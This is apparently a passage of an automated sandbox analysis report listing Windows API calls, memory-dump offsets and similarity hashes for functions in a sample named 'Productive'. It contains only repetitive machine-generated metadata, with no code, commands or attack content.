                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3741023627-0
                                                                                                                                                                • Opcode ID: c35d55b324f499b16c798164c8cc815f0105b06aeac1cc3c9cc93e1a22c97e9c
                                                                                                                                                                • Instruction ID: bb5a96aecf9537fcc6be35190bdb370c7edacd1e28fe342b94af91df2b29f202
                                                                                                                                                                • Opcode Fuzzy Hash: c35d55b324f499b16c798164c8cc815f0105b06aeac1cc3c9cc93e1a22c97e9c
                                                                                                                                                                • Instruction Fuzzy Hash: 8F01A234621704ABEB265B20DD9EBA67B7CFB01701F010769A682A54E1DBF4B9648E80
                                                                                                                                                                APIs
                                                                                                                                                                • EndPath.GDI32(?), ref: 002B179B
                                                                                                                                                                • StrokeAndFillPath.GDI32(?,?,002EBBC9,00000000,?), ref: 002B17B7
                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 002B17CA
                                                                                                                                                                • DeleteObject.GDI32 ref: 002B17DD
                                                                                                                                                                • StrokePath.GDI32(?), ref: 002B17F8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2625713937-0
                                                                                                                                                                • Opcode ID: 9ced03903d2841888556b5c3cd8ed4b41a6a99e5fc03e37012cf52781e7ca971
                                                                                                                                                                • Instruction ID: c65b76e80eaab1f55789cd4a6ddf17ce991ebf9227fc0064d49eb4816e4522d8
                                                                                                                                                                • Opcode Fuzzy Hash: 9ced03903d2841888556b5c3cd8ed4b41a6a99e5fc03e37012cf52781e7ca971
                                                                                                                                                                • Instruction Fuzzy Hash: 29F01930118249FBDB3B5F25EC0DB997BA8AB02362F488214E92D891F1CB3059A5EF51
                                                                                                                                                                APIs
                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 0031CA75
                                                                                                                                                                • CoCreateInstance.OLE32(00343D3C,00000000,00000001,00343BAC,?), ref: 0031CA8D
                                                                                                                                                                • CoUninitialize.OLE32 ref: 0031CCFA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                                                • String ID: .lnk
                                                                                                                                                                • API String ID: 948891078-24824748
                                                                                                                                                                • Opcode ID: 58e0997c897daf4f9ad08009f93eab09e33f4b57c8ad112ac4998cf975567e6d
                                                                                                                                                                • Instruction ID: c73fdc44e8206d82751d03566f2feafac0d23dd08fec63742969cb3af2e20c4e
                                                                                                                                                                • Opcode Fuzzy Hash: 58e0997c897daf4f9ad08009f93eab09e33f4b57c8ad112ac4998cf975567e6d
                                                                                                                                                                • Instruction Fuzzy Hash: 27A15C71114205AFD300EF64C892EABB7ECEF95754F004A1CF1559B2A2EB70EA59CB92
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002C2A58,?,00008000), ref: 002D02A4
                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 0031BFFE
                                                                                                                                                                • CoCreateInstance.OLE32(00343D3C,00000000,00000001,00343BAC,?), ref: 0031C017
                                                                                                                                                                • CoUninitialize.OLE32 ref: 0031C034
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                                                                                                                • String ID: .lnk
                                                                                                                                                                • API String ID: 3769357847-24824748
                                                                                                                                                                • Opcode ID: d51818f5ae2dc4dcf6541da228c0c703cc616a1143f014b4d063f72f03d08726
                                                                                                                                                                • Instruction ID: 38a171fc37c75bfcd5d7f7d053e1fce215227e902d28a6f05483fb27df05d673
                                                                                                                                                                • Opcode Fuzzy Hash: d51818f5ae2dc4dcf6541da228c0c703cc616a1143f014b4d063f72f03d08726
                                                                                                                                                                • Instruction Fuzzy Hash: A4A15575214201AFCB05EF14C884E9AB7E5FF89314F058998F8999B3A2CB31ED46CF91
                                                                                                                                                                APIs
                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0031335D
                                                                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00313410
                                                                                                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0031343E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ItemMenu$Info$Default
                                                                                                                                                                • String ID: 0
                                                                                                                                                                • API String ID: 1306138088-4108050209
                                                                                                                                                                • Opcode ID: 95933fd6b04bcc44f310b081925aaece6189100a4e609ce47479295f3cdd8edc
                                                                                                                                                                • Instruction ID: b506de02a5f37b865a118f926b150f5c083ba676d4d30acd6eb684b2612db2ee
                                                                                                                                                                • Opcode Fuzzy Hash: 95933fd6b04bcc44f310b081925aaece6189100a4e609ce47479295f3cdd8edc
                                                                                                                                                                • Instruction Fuzzy Hash: F551F5316083009BD72BAF29D8456ABB7E8EF4A310F054A2EF895D3191DF30DE94CB56
                                                                                                                                                                APIs
                                                                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 0032FC3F
                                                                                                                                                                • GetProcessId.KERNEL32(00000000), ref: 0032FCB6
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0032FCE5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseExecuteHandleProcessShell
                                                                                                                                                                • String ID: @
                                                                                                                                                                • API String ID: 1279613386-2766056989
                                                                                                                                                                • Opcode ID: af3d57e7af6057cf2eacfec3d295fe01656bd31a13e439c2d26685b4fca99d1c
                                                                                                                                                                • Instruction ID: 62cd6f095ab00cb7d489b628baa87081c63795fb7b2c9e6a020f90bac8260700
                                                                                                                                                                • Opcode Fuzzy Hash: af3d57e7af6057cf2eacfec3d295fe01656bd31a13e439c2d26685b4fca99d1c
                                                                                                                                                                • Instruction Fuzzy Hash: 3B61E075A10629DFCB15EFA4D491AAEBBF4FF48310F108569E846AB352CB30AD51CF90
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: #$+
                                                                                                                                                                • API String ID: 0-2552117581
                                                                                                                                                                • Opcode ID: 6866efb63ee737c63d297d0958eaf5aa2b14c2f5d28363c12a056dc15720c438
                                                                                                                                                                • Instruction ID: fad6e894c5014368c62e4a073573a563de09a008f4579f5c50905cd3440fb13e
                                                                                                                                                                • Opcode Fuzzy Hash: 6866efb63ee737c63d297d0958eaf5aa2b14c2f5d28363c12a056dc15720c438
                                                                                                                                                                • Instruction Fuzzy Hash: E0513675501256CFEB16DF68C4A6AFA7BA4EF56310F148056FC929B2E0C734AC72CB60
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00311CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00309E4E,?,?,00000034,00000800,?,00000034), ref: 00311CE5
                                                                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0030A3F7
                                                                                                                                                                  • Part of subcall function 00311C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00309E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00311CB0
                                                                                                                                                                  • Part of subcall function 00311BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00311C08
                                                                                                                                                                  • Part of subcall function 00311BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00309E12,00000034,?,?,00001004,00000000,00000000), ref: 00311C18
                                                                                                                                                                  • Part of subcall function 00311BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00309E12,00000034,?,?,00001004,00000000,00000000), ref: 00311C2E
                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0030A464
                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0030A4B1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                • String ID: @
                                                                                                                                                                • API String ID: 4150878124-2766056989
                                                                                                                                                                • Opcode ID: ea89a1e2f5100695a657835b07368a39022dfb10a80acd4d4e78a2ebbf05dd1a
                                                                                                                                                                • Instruction ID: b496b4fff9634959a1431d3035850d19fc1d022f0cf5653ba76fabaeb38a6eef
                                                                                                                                                                • Opcode Fuzzy Hash: ea89a1e2f5100695a657835b07368a39022dfb10a80acd4d4e78a2ebbf05dd1a
                                                                                                                                                                • Instruction Fuzzy Hash: 16415C7694121CBFCB15DFA4CD85ADEBBB8EF49300F014095FA45BB280DA706E85CBA1
                                                                                                                                                                APIs
                                                                                                                                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00312F83
                                                                                                                                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 00312FC9
                                                                                                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00377890,00000000), ref: 00313012
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$Delete$InfoItem
                                                                                                                                                                • String ID: 0
                                                                                                                                                                • API String ID: 135850232-4108050209
                                                                                                                                                                • Opcode ID: 95bf7551d7993ff94766258fccb3e8814b1490e1b8591836cb481c9448b8099a
                                                                                                                                                                • Instruction ID: 44792a6c8cf356c4c2ef799c4f50b0c03ab42e0caf7f44944e48ed0055efd0af
                                                                                                                                                                • Opcode Fuzzy Hash: 95bf7551d7993ff94766258fccb3e8814b1490e1b8591836cb481c9448b8099a
                                                                                                                                                                • Instruction Fuzzy Hash: 9241C3312083419FD729DF24C844B9ABBE8AF8D310F114A1DF5669B291DB70E955CB52
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00314BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00313B8A,?), ref: 00314BE0
                                                                                                                                                                  • Part of subcall function 00314BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00313B8A,?), ref: 00314BF9
                                                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00313BAA
                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00313BDE
                                                                                                                                                                • SHFileOperationW.SHELL32(?), ref: 00313C92
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileFullNamePath$MoveOperationlstrcmpi
                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                • API String ID: 67141772-1173974218
                                                                                                                                                                • Opcode ID: 8aea5b67b89cfae292450ecd526e2f27c6ec6efd3ff5d3276729e652b564ede9
                                                                                                                                                                • Instruction ID: 5487a7127232340625b85fb628a4ed062c205be3c80d3306cb8bde1c1f76fade
                                                                                                                                                                • Opcode Fuzzy Hash: 8aea5b67b89cfae292450ecd526e2f27c6ec6efd3ff5d3276729e652b564ede9
                                                                                                                                                                • Instruction Fuzzy Hash: 3B418B7150C344AAC75AEF64C481ADBB7ECAF89340F40492EF48AD7291EB34D698CB52
                                                                                                                                                                APIs
                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00340980,00000000,?,?,?,?), ref: 00338004
                                                                                                                                                                • GetWindowLongW.USER32 ref: 00338021
                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00338031
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Long
                                                                                                                                                                • String ID: SysTreeView32
                                                                                                                                                                • API String ID: 847901565-1698111956
                                                                                                                                                                • Opcode ID: ba3db2c1683d9683d16772e2d71d320aafe11912b9128e0425a3e57146c1f889
                                                                                                                                                                • Instruction ID: 04f5d26d5ac6f8f1d263c2480ac513fc03b806a7adda6ccd74688fc6f7f2b7f1
                                                                                                                                                                • Opcode Fuzzy Hash: ba3db2c1683d9683d16772e2d71d320aafe11912b9128e0425a3e57146c1f889
                                                                                                                                                                • Instruction Fuzzy Hash: 7B31B071214205AFDB2A8F34CC85BEA77A9FB45364F254725F975932E0CB30A8549B60
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00337A86
                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00337A9A
                                                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00337ABE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$Window
                                                                                                                                                                • String ID: SysMonthCal32
                                                                                                                                                                • API String ID: 2326795674-1439706946
                                                                                                                                                                • Opcode ID: aa42543e8e8cb5196ce471d196943bd4351b34df86436ee8b7aa33b56eff2625
                                                                                                                                                                • Instruction ID: 7bd2f7148ab04d520c3053d87550f156e48c5e6e27775cafe462cd07ac06ef53
                                                                                                                                                                • Opcode Fuzzy Hash: aa42543e8e8cb5196ce471d196943bd4351b34df86436ee8b7aa33b56eff2625
                                                                                                                                                                • Instruction Fuzzy Hash: 2921B532614218BFDF268F54CC86FEE3B69EF48714F120114FE156B2D0DA71A854DB90
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0033826F
                                                                                                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0033827D
                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00338284
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$DestroyWindow
                                                                                                                                                                • String ID: msctls_updown32
                                                                                                                                                                • API String ID: 4014797782-2298589950
                                                                                                                                                                • Opcode ID: 2fa73f41404f9e9c3352e1283f52ea96e8c7410c67625aa4975d1f123531f5ce
                                                                                                                                                                • Instruction ID: e9f1d2415d836c95dc243271c5e113d6e35a057de2d9d99905766256c4229e17
                                                                                                                                                                • Opcode Fuzzy Hash: 2fa73f41404f9e9c3352e1283f52ea96e8c7410c67625aa4975d1f123531f5ce
                                                                                                                                                                • Instruction Fuzzy Hash: A62190B5A14209AFDB12DF58CCC5DA737EDEB4A394F090459FA059B261CB70EC51CBA0
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00337360
                                                                                                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00337370
                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00337395
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                                                                • String ID: Listbox
                                                                                                                                                                • API String ID: 3315199576-2633736733
                                                                                                                                                                • Opcode ID: ac3b3be01495f9218366e74e512739ddddbc76f4c5e68fb61abf79fd807f63da
                                                                                                                                                                • Instruction ID: 74ac1180726dfab3c4a58239fd1bc3a27271facba91c69ea621b573f1bee5214
                                                                                                                                                                • Opcode Fuzzy Hash: ac3b3be01495f9218366e74e512739ddddbc76f4c5e68fb61abf79fd807f63da
                                                                                                                                                                • Instruction Fuzzy Hash: 6D21B372614118BFDF268F54CCC5EFF37AAEB89764F028124FA459B190C671AC519BA0
                                                                                                                                                                APIs
                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0031B297
                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0031B2EB
                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,00340980), ref: 0031B342
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
